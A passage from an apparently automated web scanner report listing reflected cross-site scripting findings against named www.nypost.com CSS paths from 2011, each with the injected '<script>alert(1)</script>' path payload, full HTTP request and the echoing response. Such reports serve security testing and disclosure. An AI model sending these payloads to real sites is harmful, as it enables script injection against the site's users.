Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost2150d<script>alert(1)</script>094611fd17a/blocks/top_story/default_photo.css</p>
...[SNIP]...

1.312. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aa929<script>alert(1)</script>b0a94806a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksaa929<script>alert(1)</script>b0a94806a5/top_story/default_photo.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 726
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksaa929<script>alert(1)</script>b0a94806a5/top_story/default_photo.css</p>
...[SNIP]...

1.313. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d5f62<script>alert(1)</script>b9babe94117 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/top_storyd5f62<script>alert(1)</script>b9babe94117/default_photo.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/top_storyd5f62<script>alert(1)</script>b9babe94117/default_photo.css</p>
...[SNIP]...

1.314. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload dc03e<script>alert(1)</script>b89ce48fcec was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.cssdc03e<script>alert(1)</script>b89ce48fcec HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:38 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.cssdc03e<script>alert(1)</script>b89ce48fcec</p>
...[SNIP]...

1.315. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45225<script>alert(1)</script>7daa30c527 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig45225<script>alert(1)</script>7daa30c527/WebPortal/nypost/blocks/top_story/top_story_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 730
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig45225<script>alert(1)</script>7daa30c527/WebPortal/nypost/blocks/top_story/top_story_default.css</p>
...[SNIP]...

1.316. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f0dd7<script>alert(1)</script>62fcea1f4b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortalf0dd7<script>alert(1)</script>62fcea1f4b0/nypost/blocks/top_story/top_story_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortalf0dd7<script>alert(1)</script>62fcea1f4b0/nypost/blocks/top_story/top_story_default.css</p>
...[SNIP]...

1.317. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45696<script>alert(1)</script>ab0d93b4f5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost45696<script>alert(1)</script>ab0d93b4f5f/blocks/top_story/top_story_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost45696<script>alert(1)</script>ab0d93b4f5f/blocks/top_story/top_story_default.css</p>
...[SNIP]...

1.318. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 94c19<script>alert(1)</script>15c969eb1fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks94c19<script>alert(1)</script>15c969eb1fb/top_story/top_story_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks94c19<script>alert(1)</script>15c969eb1fb/top_story/top_story_default.css</p>
...[SNIP]...

1.319. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 60451<script>alert(1)</script>16f310637d2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story60451<script>alert(1)</script>16f310637d2/top_story_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/top_story60451<script>alert(1)</script>16f310637d2/top_story_default.css</p>
...[SNIP]...

1.320. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 8650f<script>alert(1)</script>d932ec1b69 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css8650f<script>alert(1)</script>d932ec1b69 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 730
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:43 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css8650f<script>alert(1)</script>d932ec1b69</p>
...[SNIP]...

1.321. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43a61<script>alert(1)</script>b8d2cd6ca52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig43a61<script>alert(1)</script>b8d2cd6ca52/WebPortal/nypost/blocks/top_story/video/top_story_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:15 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig43a61<script>alert(1)</script>b8d2cd6ca52/WebPortal/nypost/blocks/top_story/video/top_story_video.css</p>
...[SNIP]...

1.322. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a34b8<script>alert(1)</script>8a92205488c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortala34b8<script>alert(1)</script>8a92205488c/nypost/blocks/top_story/video/top_story_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortala34b8<script>alert(1)</script>8a92205488c/nypost/blocks/top_story/video/top_story_video.css</p>
...[SNIP]...

1.323. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4c900<script>alert(1)</script>c367d9630d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost4c900<script>alert(1)</script>c367d9630d2/blocks/top_story/video/top_story_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost4c900<script>alert(1)</script>c367d9630d2/blocks/top_story/video/top_story_video.css</p>
...[SNIP]...

1.324. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 243be<script>alert(1)</script>e0e4d5cffc5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks243be<script>alert(1)</script>e0e4d5cffc5/top_story/video/top_story_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:24 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks243be<script>alert(1)</script>e0e4d5cffc5/top_story/video/top_story_video.css</p>
...[SNIP]...

1.325. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5a4d1<script>alert(1)</script>80ae711010d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story5a4d1<script>alert(1)</script>80ae711010d/video/top_story_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/top_story5a4d1<script>alert(1)</script>80ae711010d/video/top_story_video.css</p>
...[SNIP]...

1.326. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 51cc9<script>alert(1)</script>0f28129027c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video51cc9<script>alert(1)</script>0f28129027c/top_story_video.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/top_story/video51cc9<script>alert(1)</script>0f28129027c/top_story_video.css</p>
...[SNIP]...

1.327. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 1be2f<script>alert(1)</script>dd560a15c03 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css1be2f<script>alert(1)</script>dd560a15c03 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/top_story/video/top_story_video.css1be2f<script>alert(1)</script>dd560a15c03</p>
...[SNIP]...

1.328. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 342a4<script>alert(1)</script>2d497ed0848 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig342a4<script>alert(1)</script>2d497ed0848/WebPortal/nypost/blocks/weather/weather.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig342a4<script>alert(1)</script>2d497ed0848/WebPortal/nypost/blocks/weather/weather.css</p>
...[SNIP]...

1.329. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/weather/weather.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcab8<script>alert(1)</script>fad90052008 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortalfcab8<script>alert(1)</script>fad90052008/nypost/blocks/weather/weather.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

